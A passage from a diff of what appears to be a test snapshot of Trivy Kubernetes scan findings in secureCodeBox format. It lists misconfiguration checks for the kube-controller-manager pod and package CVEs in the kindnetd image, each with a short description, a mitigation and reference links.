"fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0038", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0038", + ], + }, + "category": "Misconfiguration", + "description": "Enable kubelet server certificate rotation on controller-manager.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", + "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://avd.aquasec.com/misconfig/kcv0038", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", ], }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "1.8.2.2", + "packageName": "apt", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-37600", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-37600", + "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "https://github.com/karelzak/util-linux/issues/1395", + "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "https://security.netapp.com/advisory/ntap-20210902-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-37600", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://avd.aquasec.com/nvd/cve-2021-37600", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://access.redhat.com/security/cve/CVE-2021-37600", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://github.com/karelzak/util-linux/issues/1395", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", + ], + }, + "category": "Vulnerability", + "description": "chroot in GNU coreutils, when used with 